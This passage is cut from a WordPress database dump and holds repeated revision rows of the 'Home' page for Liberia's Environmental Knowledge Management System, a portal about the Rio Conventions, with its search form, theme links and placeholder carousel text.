https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\" title=\"Nulla metus metus ullamcorper vel tincidunt\">Nulla metus metus ullamcorper vel tincidunt</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\" title=\"Lacinia nunc curabitur tortor pellentesque\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-300x166.jpg\" alt=\"Lacinia nunc curabitur tortor pellentesque\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\" title=\"Lacinia nunc curabitur tortor pellentesque\">Lacinia nunc curabitur tortor pellentesque</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n			<!-- .oew-carousel -->\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-09 14:57:15','2019-11-09 14:57:15','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(497,1,'2019-11-09 14:58:32','2019-11-09 14:58:32','<h2>Welcome to the EKMS</h2>		\n		<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"All Categories\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>All Categories</option>\n	<option value=\"4\">News</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-09 14:58:32','2019-11-09 14:58:32','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(498,1,'2019-11-09 15:00:10','2019-11-09 15:00:10','','Conventions Themes','','inherit','closed','closed','','87-revision-v1','','','2019-11-09 15:00:10','2019-11-09 15:00:10','',87,'https://ekmsliberia.info/87-revision-v1/',0,'revision','',0),(499,1,'2019-11-09 15:01:08','2019-11-09 15:01:08','','Related Themes','','inherit','closed','closed','','87-revision-v1','','','2019-11-09 15:01:08','2019-11-09 15:01:08','',87,'https://ekmsliberia.info/87-revision-v1/',0,'revision','',0),(501,1,'2019-11-09 15:07:50','2019-11-09 15:07:50','<h2>Welcome to the EKMS</h2>		\n		<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"All Categories\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>All Categories</option>\n	<option value=\"4\">News</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-09 15:07:50','2019-11-09 15:07:50','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(502,1,'2019-11-09 15:21:08','2019-11-09 15:21:08','<h2>Welcome to the EKMS</h2>		\n		<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"All Categories\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>All Categories</option>\n	<option value=\"4\">News</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-theme/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-theme/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-09 15:21:08','2019-11-09 15:21:08','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(503,1,'2019-11-09 15:28:36','2019-11-09 15:28:36','<h2>Welcome to the EKMS</h2>		\n		<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"All Categories\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>All Categories</option>\n	<option value=\"4\">News</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-theme/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-theme/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-09 15:28:36','2019-11-09 15:28:36','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(504,1,'2019-11-09 15:30:14','2019-11-09 15:30:14','<h2>Welcome to the EKMS</h2>		\n		<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"All Categories\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>All Categories</option>\n	<option value=\"4\">News</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-theme/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-theme/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-09 15:30:14','2019-11-09 15:30:14','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(506,1,'2019-11-09 15:36:10','2019-11-09 15:36:10','<h2>Welcome to the EKMS</h2>		\n		<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"All Categories\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>All Categories</option>\n	<option value=\"4\">News</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-theme/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-theme/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-themes/\" role=\"button\">\n						Explore All Themes\n					</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-09 15:36:10','2019-11-09 15:36:10','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(507,1,'2019-11-09 15:37:22','2019-11-09 15:37:22','<h2>Welcome to the EKMS</h2>		\n		<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"All Categories\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>All Categories</option>\n	<option value=\"4\">News</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-theme/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-theme/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-themes/\" role=\"button\">\n						Explore All Themes\n					</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-09 15:37:22','2019-11-09 15:37:22','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(508,1,'2019-11-09 15:42:22','2019-11-09 15:42:22','<h2>Welcome to the EKMS</h2>		\n		<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"All Categories\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>All Categories</option>\n	<option value=\"4\">News</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-theme/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-theme/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-themes/\" role=\"button\">\n						Explore All Themes\n					</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-09 15:42:22','2019-11-09 15:42:22','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(509,1,'2019-11-09 15:44:40','2019-11-09 15:44:40','<h2>Welcome to the EKMS</h2>		\n		<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"All Categories\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>All Categories</option>\n	<option value=\"4\">News</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-theme/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-theme/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-themes/\" role=\"button\">\n						Explore All Themes\n					</a>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-09 15:44:40','2019-11-09 15:44:40','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(511,1,'2019-11-09 15:48:12','2019-11-09 15:48:12','<h2>Welcome to the EKMS</h2>		\n		<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"All Categories\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>All Categories</option>\n	<option value=\"4\">News</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h1>Knowledge Resources</h1>		\n			</i>\",\"nextArrow\":\"<i class=\"fa fa-angle-left jet-arrow-next jet-blog-arrow\"></i>\",\"autoplay\":false,\"autoplaySpeed\":5000,\"rtl\":false}\' dir=\"ltr\">\n												Local Communities and Indigenous People																			\n		<a href=\"https://ekmsliberia.info/related-theme/local-communities-and-indigenous-people/\" aria-label=\"Local Communities and Indigenous People\"></a>\n												Land and Climate																			\n		<a href=\"https://ekmsliberia.info/related-theme/land-and-climate/\" aria-label=\"Land and Climate\"></a>\n												Forest Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/forest-biodiversity/\" aria-label=\"Forest Biodiversity\"></a>\n												Inland Waters Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/inland-waters-biodiversity/\" aria-label=\"Inland Waters Biodiversity\"></a>\n												Marine and Coastal Biodiversity																			\n		<a href=\"https://ekmsliberia.info/related-theme/marine-and-coastal-biodiversity/\" aria-label=\"Marine and Coastal Biodiversity\"></a>\n			<a href=\"https://ekmsliberia.info/related-themes/\" role=\"button\">\n						Explore All Themes\n					</a>\n			<h2>Explore by Institution</h2>','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-09 15:48:12','2019-11-09 15:48:12','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(512,1,'2019-11-09 15:48:51','2019-11-09 15:48:51','<h2>Welcome to the EKMS</h2>		\n		<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"All Categories\" id=\'jet_ajax_search_categories_f4a4a39\' 